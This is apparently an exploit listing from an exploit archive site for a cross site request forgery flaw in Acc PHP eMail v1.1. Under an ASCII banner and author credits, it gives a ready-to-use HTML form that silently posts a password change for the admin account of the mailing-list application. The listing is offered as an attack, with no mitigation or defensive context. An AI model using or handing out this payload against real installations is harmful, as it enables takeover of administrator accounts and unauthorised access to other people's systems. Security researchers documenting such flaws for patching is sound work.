Acc PHP eMail version 1.1 suffers from a cross site request forgery vulnerability.
4581b3ccb8d64f6255f9996650a5bd65a510942012ece4b44f8874f82378819a
view source
print?
______ __ ______
/\ == \ /\ \ /\ __ \
\ \ __< \ \ \ \ \ \/\ \
\ \_____\ \ \_\ \ \_____\
\/_____/ \/_/ \/_____/
01000010 01101001 01001111
[#]----------------------------------------------------------------[#]
#
# [+] Acc PHP eMail v1.1 - [ CSRF ]
#
# // Author Info
# [x] Author: bi0
# [x] Contact: bukibv@hotmail.com
# [x] Homepage : www.ssteam.ws
# [x] Thanks: packetdeath,,Zer0flag,redking and ssteam.ws ...
#
[#]-------------------------------------------------------------------------------------------[#]
#
# [x] Exploit :
#
# [ CSRF ]
#
# It Changes the password
#
# http://localhost/mailinglist/index.php
#
# // Start CSRF
# <html>
# <form action="http://localhost/mailinglist/demo/index.php" method="POST">
# <input type="hidden" name="action" value="change">
# <input type="hidden" name="id" value="1">
# <input type="hidden" id="text" name="user" value="admin">
# <input type="password" name="password" value="pass">
# <input type="password" name="password1" value="pass">
# <input type="hidden" name="action" value="change1">
# <input type="submit" name="login" value="Modify">
# </form>
# </html>
# // End of attack
#
[#]------------------------------------------------------------------------------------------[#]
#EOF
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed